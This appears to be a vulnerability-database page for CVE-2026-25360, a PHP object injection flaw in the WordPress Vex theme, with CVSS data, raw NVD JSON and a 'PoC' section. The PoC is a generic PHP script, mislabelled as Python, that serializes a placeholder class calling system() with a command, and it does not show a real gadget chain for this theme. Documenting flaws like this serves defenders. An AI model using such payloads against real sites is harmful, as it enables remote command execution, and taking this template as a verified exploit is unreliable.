Security Vulnerability Report
中文
CVE-2026-25360 CVSS 8.8 HIGH

CVE-2026-25360

Published: 2026-03-25 17:16:47
Last Modified: 2026-04-24 16:32:54

Description

Deserialization of Untrusted Data vulnerability in rascals Vex vex allows Object Injection.This issue affects Vex: from n/a through < 1.2.9.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Vex < 1.2.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // PoC for CVE-2026-25360: WordPress Vex Theme PHP Object Injection // This script generates a payload to demonstrate the vulnerability. // Note: Actual exploitation depends on available classes (Gadget chains) in the target environment. class Vulnerable_Class { // Placeholder for a class that might exist in the theme or WordPress core public $data; public function __destruct() { // Simulated malicious action system($this->data); } } // Generate the payload $object = new Vulnerable_Class(); $object->data = "id"; // Command to execute // Serialize the object $payload = serialize($object); echo "Generated Payload:\n"; echo urlencode($payload); // Usually needs to be URL encoded for HTTP transmission ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25360", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:47.143", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in rascals Vex vex allows Object Injection.This issue affects Vex: from n/a through < 1.2.9."}, {"lang": "es", "value": "Vulnerabilidad de deserialización de datos no confiables en rascals Vex vex permite la inyección de objetos. Este problema afecta a Vex: desde n/a hasta &lt; 1.2.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/vex/vulnerability/wordpress-vex-theme-1-2-9-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}